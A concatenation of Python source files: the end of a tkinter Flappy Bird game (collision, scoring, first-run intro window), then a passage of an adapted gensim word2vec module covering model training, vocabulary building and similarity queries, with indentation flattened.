if self.game.dev: #with development mode you can not die!
print("GameOver::Status")
#time.sleep(0.4)
else:
self.game.gameover()
if pos_palo[2] <= 0:
self.game.canvas.delete(self.id)
#choose if after the border the stick it will be with side bottom or side top
if bool(randint(0,1)): #random choose #top
y = randint(-60, 0)
self.id = self.game.canvas.create_image(600,y, image=self.image, anchor="nw")
self.side = "top"
return
else: #bottom
y = randint(350, 420)
self.id = self.game.canvas.create_image(600,y, image=self.image1, anchor="nw")
self.side = "bottom"
return
if pos_palo[2] == 220: #===SCORE MANIPULATION===
self.game.play_sound(self.game.dir+"FlappyBird_Game/FlappyBird_Sounds/point.mp3")
self.game.score += 1
if self.game.score > self.game.highscore: #if you beat your highscore
self.game.highscore = self.game.score
self.game.update_score()
class Palo_Riserva():
def __init__(self, game, palo, side, ball, image, image1):
self.game = game
self.palo = palo
self.ball = ball
self.image = image
self.image1 = image1
self.iw, self.ih = (image.width(), image.height())
#create the stick with the opposite side of the other corrispondent stick
if side == "bottom":
self.id = self.game.canvas.create_image(self.palo.coord[0], \
self.palo.coord[3]+self.game.bars_space, \
image=self.image1, anchor="nw")
elif side == "top":
self.id = self.game.canvas.create_image(self.palo.coord[0], \
(self.palo.coord[1]-self.game.bars_space)-self.ih, \
image=self.image, anchor="nw")
self.x = -1
self.y = 0
self.s = True
tempos = self.game.GetImageCoords(self.id, [self.iw, self.ih]) #a temporary position of the stick
self.s = True
self.xc, self.yc = (tempos[0], tempos[1])
if self.game.dev:
self.collisionzone = CollisionZone(self.game, tempos[0], tempos[1], tempos[2], tempos[3])
def draw(self):
if self.game.dev and self.s:
self.collisionzone = CollisionZone(self.game, self.xc, self.yc, self.xc+self.iw, self.yc+self.ih)
self.s = False
self.game.canvas.move(self.id, self.x, self.y)
pos_palo_r = self.game.GetImageCoords(self.id, [self.iw, self.ih])
ball_pos = self.game.GetImageCoords(self.ball.id, [self.ball.iw, self.ball.ih])
if self.game.dev:
self.collisionzone.update(pos_palo_r[0], pos_palo_r[1], pos_palo_r[2], pos_palo_r[3])
elif not self.s:
del self.collisionzone
self.s = True
if self.game.collision(ball_pos, pos_palo_r): #if touching ball:
if self.game.dev:
print("GameOver::Status")
#time.sleep(0.4)
else:
self.game.gameover()
if pos_palo_r[2] <= 0: #after touching border:
self.game.canvas.delete(self.id)
if self.palo.side == "bottom": #top #if the side of the corrispondent stick is bottom this stick has side top
self.id = self.game.canvas.create_image(self.palo.coord[0], (self.palo.coord[1]-self.game.bars_space) \
-self.ih, image=self.image, anchor="nw")
elif self.palo.side == "top": #bottom
self.id = self.game.canvas.create_image(self.palo.coord[0], self.palo.coord[3]+self.game.bars_space, \
image=self.image1, anchor="nw")
def main(atmp, hs, path): #Main function for running game
global pali, pali_r, pri, pli, ball, g
g = Game(directory=path) #For development mode please write here 'g = Game(dev=True)'
g.attemps = atmp #set game attemps
g.highscore = hs #set game highscore
g.update_score()
if int(g.preferences_data['GamingIntro-Init']):
i = GamingIntro.Intro(dir=path+"FlappyBird_Game/") #Normal Intro for game
i.start_prg()
g.dev = True if g.preferences_data['DevMode'] == 'True' else False
backgroundimage = PhotoImage(file=g.dir+"FlappyBird_Game/background.gif", master=g.tk) #load background image
btm = PhotoImage(file=g.dir+"FlappyBird_Game/bottom.gif", master=g.tk) #load bottom image
bg = g.canvas.create_image(0,0, image=backgroundimage, anchor="nw")
g.canvas2.create_image(0,0, image=btm, anchor="nw")
#===IMG===
palo1 = PhotoImage(file=g.dir+"FlappyBird_Game/palo1.gif", master=g.tk)
palo2 = PhotoImage(file=g.dir+"FlappyBird_Game/palo2.gif", master=g.tk)
bird = PhotoImage(file=g.dir+"FlappyBird_Game/bird.gif", master=g.tk)
#=========
ball = Ball(g, 120, 200, bird) #init the bird class
pali = {} #a dictionary containing all the primary sticks
pali_r = {} #a dictionary containing the secondary sticks
pri = ["rpalo1", "rpalo2", "rpalo3"]
pli = ["palo1", "palo2", "palo3"]
c = 0
for x in [610, 810, 1010]:
y_value = randint(250,300)
pali[pli[c]] = Palo(g, x, y_value, ball, palo1, palo2) #Update dictionaries
pali_r[pri[c]] = Palo_Riserva(g, pali[pli[c]], "top", ball, palo1, palo2)
c += 1
g.gameIsRunning = True #Start Game
messagebox.showinfo("Game", "Game will start when you click the ok button, 'Return' or 'space' key")
g.mainloop() #Start Mainloop
if first_time and (not os.path.exists(home+".FlappyBird/directory.txt")):
tk = Tk()
fcd = open(home+".FlappyBird/directory.txt", "w")
cd = filedialog.askdirectory(title="Select the FlappyBird directory", master=tk) + "/"
fcd.write(cd)
fcd.close()
tk.destroy()
#==========================|PATH AREA|===================================
fcd = open(home+".FlappyBird/directory.txt")
cd = fcd.read().rstrip('\n')
fcd.close()
#========================================================================
if first_time:
fi = GamingIntro.Intro(dir=cd+"FlappyBird_Game/", firsttime=True, button=True) #Intro for first time using the game
#==================|Introduction|======================<
intk = Tk()
intk.title("Introduction OMGames")
messagebox.showinfo("OMGames", "Current files directory: %sFlappyBird_Game/" % cd)
pl = Label(intk, text="INTRODUCTION", font=("bold")).pack()
v1 = "Warning: If there is an \'No such file or directory\' error, please " \
"change the directory file with your \'path\'"
v2 = "Warning: This program creates files: dir: \'.FlappyBird/\'"
v3 = "Warning: Program uses modules: tkinter, random, time, sqlite3, sys, os, " \
"playsound, webbrowser, ErrorCase, HighscoreManager, FeedbackInterface, Preferences and GamingIntro"
v4 = "Warning: This game is for 7+ and is not for videodipendent people (Blocked by waiting) - :-)"
v5 = "All related images are copyright by .GEARS 2013, Program copyright by " \
"OrangoMangoGames 2019-2020 (Paul Kocian)"
v6 = "Keys: Spacebar or left button to kick the bird, p to pause and to resume, F3 for " \
"turning on and off development mode, you can change them"
v7 = "Privacy Therms: Your highscore will be accessible by all the players and you can" \
" see their highscore"
v8 = "Remember that if you close this window, you will in any case accept the Privacy Terms"
labels = []
texts = [v1, v2, v3, v4, v5, v6, v7, v8]
for text in texts:
l = Label(intk, text=text)
l.pack()
labels.append(l)
def com():
messagebox.showinfo("OMGames", "Have fun! And beat your highscores!")
intk.destroy()
return
b = Button(intk, text="Accept Privacy and Continue", command=com)
b.pack()
intk.mainloop()
#======================================================<
if __name__ == '__main__':
try:
i = GamingIntro.Intro(dir=cd+"FlappyBird_Game/") #Normal Intro for game
i.start_prg()
main(1, highscore, cd)
except Exception as e: #Fetch errors
error = ErrorManager(e)
error.showgui()
error.mainloop()
|
word2vec.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2013 Radim Rehurek <[email protected]>
# Licensed under the GNU LGPL v2.1 - http://www.gnu.org/licenses/lgpl.html
"""
Deep learning via word2vec's "skip-gram and CBOW models", using either
hierarchical softmax or negative sampling [1]_ [2]_.
The training algorithms were originally ported from the C package https://code.google.com/p/word2vec/
and extended with additional functionality.
For a blog tutorial on gensim word2vec, with an interactive web app trained on GoogleNews, visit http://radimrehurek.com/2014/02/word2vec-tutorial/
**Install Cython with `pip install cython` to use optimized word2vec training** (70x speedup [3]_).
Initialize a model with e.g.::
>>> model = Word2Vec(sentences, size=100, window=5, min_count=5, workers=4)
Persist a model to disk with::
>>> model.save(fname)
>>> model = Word2Vec.load(fname) # you can continue training with the loaded model!
The model can also be instantiated from an existing file on disk in the word2vec C format::
>>> model = Word2Vec.load_word2vec_format('/tmp/vectors.txt', binary=False) # C text format
>>> model = Word2Vec.load_word2vec_format('/tmp/vectors.bin', binary=True) # C binary format
You can perform various syntactic/semantic NLP word tasks with the model. Some of them
are already built-in::
>>> model.most_similar(positive=['woman', 'king'], negative=['man'])
[('queen', 0.50882536), ...]
>>> model.doesnt_match("breakfast cereal dinner lunch".split())
'cereal'
>>> model.similarity('woman', 'man')
0.73723527
>>> model['computer'] # raw numpy vector of a word
array([-0.00449447, -0.00310097, 0.02421786, ...], dtype=float32)
and so on.
If you're finished training a model (=no more updates, only querying), you can do
>>> model.init_sims(replace=True)
to trim unneeded model memory = use (much) less RAM.
.. [1] Tomas Mikolov, Kai Chen, Greg Corrado, and Jeffrey Dean. Efficient Estimation of Word Representations in Vector Space. In Proceedings of Workshop at ICLR, 2013.
.. [2] Tomas Mikolov, Ilya Sutskever, Kai Chen, Greg Corrado, and Jeffrey Dean. Distributed Representations of Words and Phrases and their Compositionality.
In Proceedings of NIPS, 2013.
.. [3] Optimizing word2vec in gensim, http://radimrehurek.com/2013/09/word2vec-in-python-part-two-optimizing/
"""
import logging
import sys
import os
import heapq
import time
from copy import deepcopy
import threading
try:
from queue import Queue
except ImportError:
from Queue import Queue
from numpy import exp, dot, zeros, outer, random, dtype, get_include, float32 as REAL,\
uint32, seterr, array, uint8, vstack, argsort, fromstring, sqrt, newaxis, ndarray, empty, sum as np_sum
# logger = logging.getLogger("gensim.models.word2vec")
logger = logging.getLogger("sent2vec")
# from gensim import utils, matutils # utility fnc for pickling, common scipy operations etc
import utils, matutils # utility fnc for pickling, common scipy operations etc
from six import iteritems, itervalues, string_types
from six.moves import xrange
try:
from gensim_addons.models.word2vec_inner import train_sentence_sg, train_sentence_cbow, FAST_VERSION
except ImportError:
try:
# try to compile and use the faster cython version
import pyximport
models_dir = os.path.dirname(__file__) or os.getcwd()
pyximport.install(setup_args={"include_dirs": [models_dir, get_include()]})
from word2vec_inner import train_sentence_sg, train_sentence_cbow, FAST_VERSION
except:
# failed... fall back to plain numpy (20-80x slower training than the above)
FAST_VERSION = -1
def train_sentence_sg(model, sentence, alpha, work=None):
"""
Update skip-gram model by training on a single sentence.
The sentence is a list of Vocab objects (or None, where the corresponding
word is not in the vocabulary. Called internally from `Word2Vec.train()`.
This is the non-optimized, Python version. If you have cython installed, gensim
will use the optimized version from word2vec_inner instead.
"""
if model.negative:
# precompute negative labels
labels = zeros(model.negative + 1)
labels[0] = 1.0
for pos, word in enumerate(sentence):
if word is None:
continue # OOV word in the input sentence => skip
reduced_window = random.randint(model.window) # `b` in the original word2vec code
# now go over all words from the (reduced) window, predicting each one in turn
start = max(0, pos - model.window + reduced_window)
for pos2, word2 in enumerate(sentence[start : pos + model.window + 1 - reduced_window], start):
# don't train on OOV words and on the `word` itself
if word2 and not (pos2 == pos):
l1 = model.syn0[word2.index]
neu1e = zeros(l1.shape)
if model.hs:
# work on the entire tree at once, to push as much work into numpy's C routines as possible (performance)
l2a = deepcopy(model.syn1[word.point]) # 2d matrix, codelen x layer1_size
fa = 1.0 / (1.0 + exp(-dot(l1, l2a.T))) # propagate hidden -> output
ga = (1 - word.code - fa) * alpha # vector of error gradients multiplied by the learning rate
model.syn1[word.point] += outer(ga, l1) # learn hidden -> output
neu1e += dot(ga, l2a) # save error
if model.negative:
# use this word (label = 1) + `negative` other random words not from this sentence (label = 0)
word_indices = [word.index]
while len(word_indices) < model.negative + 1:
w = model.table[random.randint(model.table.shape[0])]
if w != word.index:
word_indices.append(w)
l2b = model.syn1neg[word_indices] # 2d matrix, k+1 x layer1_size
fb = 1. / (1. + exp(-dot(l1, l2b.T))) # propagate hidden -> output
gb = (labels - fb) * alpha # vector of error gradients multiplied by the learning rate
model.syn1neg[word_indices] += outer(gb, l1) # learn hidden -> output
neu1e += dot(gb, l2b) # save error
model.syn0[word2.index] += neu1e # learn input -> hidden
return len([word for word in sentence if word is not None])
def train_sentence_cbow(model, sentence, alpha, work=None, neu1=None):
"""
Update CBOW model by training on a single sentence.
The sentence is a list of Vocab objects (or None, where the corresponding
word is not in the vocabulary. Called internally from `Word2Vec.train()`.
This is the non-optimized, Python version. If you have cython installed, gensim
will use the optimized version from word2vec_inner instead.
"""
if model.negative:
# precompute negative labels
labels = zeros(model.negative + 1)
labels[0] = 1.
for pos, word in enumerate(sentence):
if word is None:
continue # OOV word in the input sentence => skip
reduced_window = random.randint(model.window) # `b` in the original word2vec code
start = max(0, pos - model.window + reduced_window)
window_pos = enumerate(sentence[start : pos + model.window + 1 - reduced_window], start)
word2_indices = [word2.index for pos2, word2 in window_pos if (word2 is not None and pos2 != pos)]
l1 = np_sum(model.syn0[word2_indices], axis=0) # 1 x layer1_size
if word2_indices and model.cbow_mean:
l1 /= len(word2_indices)
neu1e = zeros(l1.shape)
if model.hs:
l2a = model.syn1[word.point] # 2d matrix, codelen x layer1_size
fa = 1. / (1. + exp(-dot(l1, l2a.T))) # propagate hidden -> output
ga = (1. - word.code - fa) * alpha # vector of error gradients multiplied by the learning rate
model.syn1[word.point] += outer(ga, l1) # learn hidden -> output
neu1e += dot(ga, l2a) # save error
if model.negative:
# use this word (label = 1) + `negative` other random words not from this sentence (label = 0)
word_indices = [word.index]
while len(word_indices) < model.negative + 1:
w = model.table[random.randint(model.table.shape[0])]
if w != word.index:
word_indices.append(w)
l2b = model.syn1neg[word_indices] # 2d matrix, k+1 x layer1_size
fb = 1. / (1. + exp(-dot(l1, l2b.T))) # propagate hidden -> output
gb = (labels - fb) * alpha # vector of error gradients multiplied by the learning rate
model.syn1neg[word_indices] += outer(gb, l1) # learn hidden -> output
neu1e += dot(gb, l2b) # save error
model.syn0[word2_indices] += neu1e # learn input -> hidden, here for all words in the window separately
return len([word for word in sentence if word is not None])
class Vocab(object):
"""A single vocabulary item, used internally for constructing binary trees (incl. both word leaves and inner nodes)."""
def __init__(self, **kwargs):
self.count = 0
self.__dict__.update(kwargs)
def __lt__(self, other): # used for sorting in a priority queue
return self.count < other.count
def __str__(self):
vals = ['%s:%r' % (key, self.__dict__[key]) for key in sorted(self.__dict__) if not key.startswith('_')]
return "<" + ', '.join(vals) + ">"
class Word2Vec(utils.SaveLoad):
"""
Class for training, using and evaluating neural networks described in https://code.google.com/p/word2vec/
The model can be stored/loaded via its `save()` and `load()` methods, or stored/loaded in a format
compatible with the original word2vec implementation via `save_word2vec_format()` and `load_word2vec_format()`.
"""
def __init__(self, sentences=None, size=100, alpha=0.025, window=5, min_count=5,
sample=0, seed=1, workers=1, min_alpha=0.0001, sg=1, hs=1, negative=0, cbow_mean=0):
"""
Initialize the model from an iterable of `sentences`. Each sentence is a
list of words (unicode strings) that will be used for training.
The `sentences` iterable can be simply a list, but for larger corpora,
consider an iterable that streams the sentences directly from disk/network.
See :class:`BrownCorpus`, :class:`Text8Corpus` or :class:`LineSentence` in
this module for such examples.
If you don't supply `sentences`, the model is left uninitialized -- use if
you plan to initialize it in some other way.
`sg` defines the training algorithm. By default (`sg=1`), skip-gram is used. Otherwise, `cbow` is employed.
`size` is the dimensionality of the feature vectors.
`window` is the maximum distance between the current and predicted word within a sentence.
`alpha` is the initial learning rate (will linearly drop to zero as training progresses).
`seed` = for the random number generator.
`min_count` = ignore all words with total frequency lower than this.
`sample` = threshold for configuring which higher-frequency words are randomly downsampled;
default is 0 (off), useful value is 1e-5.
`workers` = use this many worker threads to train the model (=faster training with multicore machines)
`hs` = if 1 (default), hierarchical sampling will be used for model training (else set to 0)
`negative` = if > 0, negative sampling will be used, the int for negative
specifies how many "noise words" should be drawn (usually between 5-20)
`cbow_mean` = if 0 (default), use the sum of the context word vectors. If 1, use the mean.
Only applies when cbow is used.
"""
self.vocab = {} # mapping from a word (string) to a Vocab object
self.index2word = [] # map from a word's matrix index (int) to word (string)
self.sg = int(sg)
self.table = None # for negative sampling --> this needs a lot of RAM! consider setting back to None before saving
self.layer1_size = int(size)
if size % 4 != 0:
logger.warning("consider setting layer size to a multiple of 4 for greater performance")
self.alpha = float(alpha)
self.window = int(window)
self.seed = seed
self.min_count = min_count
self.sample = sample
self.workers = workers
self.min_alpha = min_alpha
self.hs = hs
self.negative = negative
self.cbow_mean = int(cbow_mean)
if sentences is not None:
self.build_vocab(sentences)
self.train(sentences)
def make_table(self, table_size=100000000, power=0.75):
"""
Create a table using stored vocabulary word counts for drawing random words in the negative
sampling training routines.
Called internally from `build_vocab()`.
"""
logger.info("constructing a table with noise distribution from %i words" % len(self.vocab))
# table (= list of words) of noise distribution for negative sampling
vocab_size = len(self.index2word)
self.table = zeros(table_size, dtype=uint32)
if not vocab_size:
logger.warning("empty vocabulary in word2vec, is this intended?")
return
# compute sum of all power (Z in paper)
train_words_pow = float(sum([self.vocab[word].count**power for word in self.vocab]))
# go through the whole table and fill it up with the word indexes proportional to a word's count**power
widx = 0
# normalize count^0.75 by Z
d1 = self.vocab[self.index2word[widx]].count**power / train_words_pow
for tidx in xrange(table_size):
self.table[tidx] = widx
if 1.0 * tidx / table_size > d1:
widx += 1
d1 += self.vocab[self.index2word[widx]].count**power / train_words_pow
if widx >= vocab_size:
widx = vocab_size - 1
def create_binary_tree(self):
"""
Create a binary Huffman tree using stored vocabulary word counts. Frequent words
will have shorter binary codes. Called internally from `build_vocab()`.
"""
logger.info("constructing a huffman tree from %i words" % len(self.vocab))
# build the huffman tree
heap = list(itervalues(self.vocab))
heapq.heapify(heap)
for i in xrange(len(self.vocab) - 1):
min1, min2 = heapq.heappop(heap), heapq.heappop(heap)
heapq.heappush(heap, Vocab(count=min1.count + min2.count, index=i + len(self.vocab), left=min1, right=min2))
# recurse over the tree, assigning a binary code to each vocabulary word
if heap:
max_depth, stack = 0, [(heap[0], [], [])]
while stack:
node, codes, points = stack.pop()
if node.index < len(self.vocab):
# leaf node => store its path from the root
node.code, node.point = codes, points
max_depth = max(len(codes), max_depth)
else:
# inner node => continue recursion
points = array(list(points) + [node.index - len(self.vocab)], dtype=uint32)
stack.append((node.left, array(list(codes) + [0], dtype=uint8), points))
stack.append((node.right, array(list(codes) + [1], dtype=uint8), points))
logger.info("built huffman tree with maximum node depth %i" % max_depth)
def precalc_sampling(self):
"""Precalculate each vocabulary item's threshold for sampling"""
if self.sample:
logger.info("frequent-word downsampling, threshold %g; progress tallies will be approximate" % (self.sample))
total_words = sum(v.count for v in itervalues(self.vocab))
threshold_count = float(self.sample) * total_words
for v in itervalues(self.vocab):
prob = (sqrt(v.count / threshold_count) + 1) * (threshold_count / v.count) if self.sample else 1.0
v.sample_probability = min(prob, 1.0)
def build_vocab(self, sentences):
"""
Build vocabulary from a sequence of sentences (can be a once-only generator stream).
Each sentence must be a list of unicode strings.
"""
logger.info("collecting all words and their counts")
sentence_no, vocab = -1, {}
total_words = 0
for sentence_no, sentence in enumerate(sentences):
if sentence_no % 10000 == 0:
logger.info("PROGRESS: at sentence #%i, processed %i words and %i word types" %
(sentence_no, total_words, len(vocab)))
for word in sentence:
total_words += 1
if word in vocab:
vocab[word].count += 1
else:
vocab[word] = Vocab(count=1)
logger.info("collected %i word types from a corpus of %i words and %i sentences" %
(len(vocab), total_words, sentence_no + 1))
# assign a unique index to each word
self.vocab, self.index2word = {}, []
for word, v in iteritems(vocab):
if v.count >= self.min_count:
v.index = len(self.vocab)
self.index2word.append(word)
self.vocab[word] = v
logger.info("total %i word types after removing those with count<%s" % (len(self.vocab), self.min_count))
if self.hs:
# add info about each word's Huffman encoding
self.create_binary_tree()
if self.negative:
# build the table for drawing random words (for negative sampling)
self.make_table()
# precalculate downsampling thresholds
self.precalc_sampling()
self.reset_weights()
def train(self, sentences, total_words=None, word_count=0, chunksize=100):
"""
Update the model's neural weights from a sequence of sentences (can be a once-only generator stream).
Each sentence must be a list of unicode strings.
"""
if FAST_VERSION < 0:
import warnings
warnings.warn("Cython compilation failed, training will be slow. Do you have Cython installed? `pip install cython`")
logger.info("training model with %i workers on %i vocabulary and %i features, "
"using 'skipgram'=%s 'hierarchical softmax'=%s 'subsample'=%s and 'negative sampling'=%s" %
(self.workers, len(self.vocab), self.layer1_size, self.sg, self.hs, self.sample, self.negative))
if not self.vocab:
raise RuntimeError("you must first build vocabulary before training the model")
start, next_report = time.time(), [1.0]
word_count = [word_count]
total_words = total_words or int(sum(v.count * v.sample_probability for v in itervalues(self.vocab)))
jobs = Queue(maxsize=2 * self.workers) # buffer ahead only a limited number of jobs.. this is the reason we can't simply use ThreadPool :(
lock = threading.Lock() # for shared state (=number of words trained so far, log reports...)
def worker_train():
"""Train the model, lifting lists of sentences from the jobs queue."""
work = zeros(self.layer1_size, dtype=REAL) # each thread must have its own work memory
neu1 = matutils.zeros_aligned(self.layer1_size, dtype=REAL)
while True:
job = jobs.get()
if job is None: # data finished, exit
break
# update the learning rate before every job
alpha = max(self.min_alpha, self.alpha * (1 - 1.0 * word_count[0] / total_words))
# how many words did we train on? out-of-vocabulary (unknown) words do not count
if self.sg:
job_words = sum(train_sentence_sg(self, sentence, alpha, work) for sentence in job)
else:
job_words = sum(train_sentence_cbow(self, sentence, alpha, work, neu1) for sentence in job)
with lock:
word_count[0] += job_words
elapsed = time.time() - start
if elapsed >= next_report[0]:
logger.info("PROGRESS: at %.2f%% words, alpha %.05f, %.0f words/s" %
(100.0 * word_count[0] / total_words, alpha, word_count[0] / elapsed if elapsed else 0.0))
next_report[0] = elapsed + 1.0 # don't flood the log, wait at least a second between progress reports
workers = [threading.Thread(target=worker_train) for _ in xrange(self.workers)]
for thread in workers:
thread.daemon = True # make interrupting the process with ctrl+c easier
thread.start()
def prepare_sentences():
for sentence in sentences:
# avoid calling random_sample() where prob >= 1, to speed things up a little:
sampled = [self.vocab[word] for word in sentence
if word in self.vocab and (self.vocab[word].sample_probability >= 1.0 or self.vocab[word].sample_probability >= random.random_sample())]
yield sampled
# convert input strings to Vocab objects (eliding OOV/downsampled words), and start filling the jobs queue
for job_no, job in enumerate(utils.grouper(prepare_sentences(), chunksize)):
logger.debug("putting job #%i in the queue, qsize=%i" % (job_no, jobs.qsize()))
jobs.put(job)
logger.info("reached the end of input; waiting to finish %i outstanding jobs" % jobs.qsize())
for _ in xrange(self.workers):
jobs.put(None) # give the workers heads up that they can finish -- no more work!
for thread in workers:
thread.join()
elapsed = time.time() - start
logger.info("training on %i words took %.1fs, %.0f words/s" %
(word_count[0], elapsed, word_count[0] / elapsed if elapsed else 0.0))
return word_count[0]
def reset_weights(self):
"""Reset all projection weights to an initial (untrained) state, but keep the existing vocabulary."""
logger.info("resetting layer weights")
random.seed(self.seed)
self.syn0 = empty((len(self.vocab), self.layer1_size), dtype=REAL)
# randomize weights vector by vector, rather than materializing a huge random matrix in RAM at once
for i in xrange(len(self.vocab)):
self.syn0[i] = (random.rand(self.layer1_size) - 0.5) / self.layer1_size
if self.hs:
self.syn1 = zeros((len(self.vocab), self.layer1_size), dtype=REAL)
if self.negative:
self.syn1neg = zeros((len(self.vocab), self.layer1_size), dtype=REAL)
self.syn0norm = None
def save_word2vec_format(self, fname, fvocab=None, binary=False):
"""
Store the input-hidden weight matrix in the same format used by the original
C word2vec-tool, for compatibility.
"""
if fvocab is not None:
logger.info("Storing vocabulary in %s" % (fvocab))
with utils.smart_open(fvocab, 'wb') as vout:
for word, vocab in sorted(iteritems(self.vocab), key=lambda item: -item[1].count):
vout.write(utils.to_utf8("%s %s\n" % (word, vocab.count)))
logger.info("storing %sx%s projection weights into %s" % (len(self.vocab), self.layer1_size, fname))
assert (len(self.vocab), self.layer1_size) == self.syn0.shape
with utils.smart_open(fname, 'wb') as fout:
fout.write(utils.to_utf8("%s %s\n" % self.syn0.shape))
# store in sorted order: most frequent words at the top
for word, vocab in sorted(iteritems(self.vocab), key=lambda item: -item[1].count):
row = self.syn0[vocab.index]
if binary:
fout.write(utils.to_utf8(word) + b" " + row.tostring())
else:
fout.write(utils.to_utf8("%s %s\n" % (word, ' '.join("%f" % val for val in row))))
@classmethod
def load_word2vec_format(cls, fname, fvocab=None, binary=False, norm_only=True):
"""
Load the input-hidden weight matrix from the original C word2vec-tool format.
Note that the information stored in the file is incomplete (the binary tree is missing),
so while you can query for word similarity etc., you cannot continue training
with a model loaded this way.
`binary` is a boolean indicating whether the data is in binary word2vec format.
`norm_only` is a boolean indicating whether to only store normalised word2vec vectors in memory.
Word counts are read from `fvocab` filename, if set (this is the file generated
by `-save-vocab` flag of the original C tool).
"""
counts = None
if fvocab is not None:
logger.info("loading word counts from %s" % (fvocab))
counts = {}
with utils.smart_open(fvocab) as fin:
for line in fin:
word, count = utils.to_unicode(line).strip().split()
counts[word] = int(count)
logger.info("loading projection weights from %s" % (fname))
with utils.smart_open(fname) as fin:
header = utils.to_unicode(fin.readline())
vocab_size, layer1_size = map(int, header.split()) # throws for invalid file format
result = Word2Vec(size=layer1_size)
result.syn0 = zeros((vocab_size, layer1_size), dtype=REAL)
if binary:
binary_len = dtype(REAL).itemsize * layer1_size
for line_no in xrange(vocab_size):
# mixed text and binary: read text first, then binary
word = []
while True:
ch = fin.read(1)
if ch == b' ':
break
if ch != b'\n': # ignore newlines in front of words (some binary files have newline, some don't)
word.append(ch)
word = utils.to_unicode(b''.join(word))
if counts is None:
result.vocab[word] = Vocab(index=line_no, count=vocab_size - line_no)
elif word in counts:
result.vocab[word] = Vocab(index=line_no, count=counts[word])
else:
logger.warning("vocabulary file is incomplete")
result.vocab[word] = Vocab(index=line_no, count=None)
result.index2word.append(word)
result.syn0[line_no] = fromstring(fin.read(binary_len), dtype=REAL)
else:
for line_no, line in enumerate(fin):
parts = utils.to_unicode(line).split()
if len(parts) != layer1_size + 1:
raise ValueError("invalid vector on line %s (is this really the text format?)" % (line_no))
word, weights = parts[0], map(REAL, parts[1:])
if counts is None:
result.vocab[word] = Vocab(index=line_no, count=vocab_size - line_no)
elif word in counts:
result.vocab[word] = Vocab(index=line_no, count=counts[word])
else:
logger.warning("vocabulary file is incomplete")
result.vocab[word] = Vocab(index=line_no, count=None)
result.index2word.append(word)
result.syn0[line_no] = weights
logger.info("loaded %s matrix from %s" % (result.syn0.shape, fname))
result.init_sims(norm_only)
return result
def most_similar(self, positive=[], negative=[], topn=10):
"""
Find the top-N most similar words. Positive words contribute positively towards the
similarity, negative words negatively.
This method computes cosine similarity between a simple mean of the projection
weight vectors of the given words, and corresponds to the `word-analogy` and
`distance` scripts in the original word2vec implementation.
Example::
>>> trained_model.most_similar(positive=['woman', 'king'], negative=['man'])
[('queen', 0.50882536), ...]
"""
self.init_sims()
if isinstance(positive, string_types) and not negative:
# allow calls like most_similar('dog'), as a shorthand for most_similar(['dog'])
positive = [positive]
# add weights for each word, if not already present; default to 1.0 for positive and -1.0 for negative words
positive = [(word, 1.0) if isinstance(word, string_types + (ndarray,))
else word for word in positive]
negative = [(word, -1.0) if isinstance(word, string_types + (ndarray,))
else word for word in negative]
# compute the weighted average of all words
all_words, mean = set(), []
for word, weight in positive + negative:
if isinstance(word, ndarray):
mean.append(weight * word)
elif word in self.vocab:
mean.append(weight * self.syn0norm[self.vocab[word].index])
all_words.add(self.vocab[word].index)
else:
raise KeyError("word '%s' not in vocabulary" % word)
if not mean:
raise ValueError("cannot compute similarity with no input")
mean = matutils.unitvec(array(mean).mean(axis=0)).astype(REAL)
dists = dot(self.syn0norm, mean)
if not topn:
return dists
best = argsort(dists)[::-1][:topn + len(all_words)]
# ignore (don't return) words from the input
result = [(self.index2word[sim], float(dists[sim])) for sim in best if sim not in all_words]
return result[:topn]
def doesnt_match(self, words):
"""
Which word from the given list doesn't go with the others?
Example::
>>> trained_model.doesnt_match("breakfast cereal dinner lunch".split())
'cereal'
"""
self.init_sims()
words = [word for word in words if word in self.vocab] # filter out OOV words
logger.debug("using words %s" % words)
if not words:
raise ValueError("cannot select a word from an empty list")
vectors = vstack(self.syn0norm[self.vocab[word].index] for word in words).astype(REAL)
mean = matutils.unitvec(vectors.mean(axis=0)).astype(REAL)
dists = dot(vectors, mean)
return sorted(zip(dists, words))[0][1]
def __getitem__(self, word):
"""
Return a word's representations in vector space, as a 1D numpy array.
Example::
>>> trained_model['woman']
array([ -1.40128313e-02, ...]
"""
return self.syn0[self.vocab[word].index]
def __contains__(self, word):
return word in self.vocab
def similarity(self, w1, w2):
"""
Compute cosine similarity between two words.
Example::
>>> trained_model.similarity('woman', 'man')
0.73723527
>>> trained_model.similarity('woman', 'woman')
1.0
"""
return dot(matutils.unitvec(self[w1]), matutils.unitvec(self[w2]))
def init_sims(self, replace=False):
"""
Precompute L2-normalized vectors.
If `replace` is set, forget the original vectors and only keep the normalized
ones = saves lots of memory!
Note that you **cannot continue training** after doing a replace. The model becomes
effectively read-only = you can call `most_similar`, `similarity` etc., but not `train`.
"""
if getattr(self, 'syn0norm', None) is None or replace:
logger.info("precomputing L2-norms of word weight vectors")
if replace:
for i in xrange(self.syn0.shape[0]):
self.syn0[i, :] /= sqrt((self.syn0[i, :] ** 2).sum(-1))
self.syn0norm = self.syn0
if hasattr(self, 'syn1'):
del self.syn1
else:
self.syn0norm = (self.syn0 / sqrt((self.syn0 ** 2).sum(-1))[..., newaxis]).astype(REAL)
def accuracy(self, questions, restrict_vocab=30000):
"""
Compute accuracy of the model. `questions` is a filename where lines are
4-tuples of words, split into sections by ": SECTION NAME" lines.
See https://code.google.com/p/word2vec/source/browse/trunk/questions-words.txt for an example.
The accuracy is reported (=printed to log and returned as a list) for each
section separately, plus there's one aggregate summary at the end.
Use `restrict_vocab` to ignore all questions containing a word whose frequency
is not in the top-N most frequent words (default top 30,000).
This method corresponds to the `compute-accuracy` script of the original C word2vec.
"""
ok_vocab = dict(sorted(iteritems(self.vocab),
key=lambda item: -item[1].count)[:restrict_vocab])
ok_index = set(v.index for v in itervalues(ok_vocab))
def log_accuracy(section):
correct, incorrect = section['correct'], section['incorrect']
if correct + incorrect > 0:
logger.info("%s: %.1f%% (%i/%i)" %
(section['section'], 100.0 * correct / (correct + incorrect),
correct, correct + incorrect))
sections, section = [], None
for line_no, line in enumerate(utils.smart_open(questions)):
# TODO: use level3 BLAS (=evaluate multiple questions at once), for speed
line = utils.to_unicode(line)
if line.startswith(': '):
# a new section starts => store the old section
if section:
sections.append(section)
log_accuracy(section)
section = {'section': line.lstrip(': ').strip(), 'correct': 0, 'incorrect': 0}
else:
if not section:
raise ValueError("missing section header before line #%i in %s" % (line_no, questions))
try:
a, b, c, expected = [word.lower() for word in line.split()] # TODO assumes vocabulary preprocessing uses lowercase, too...
except:
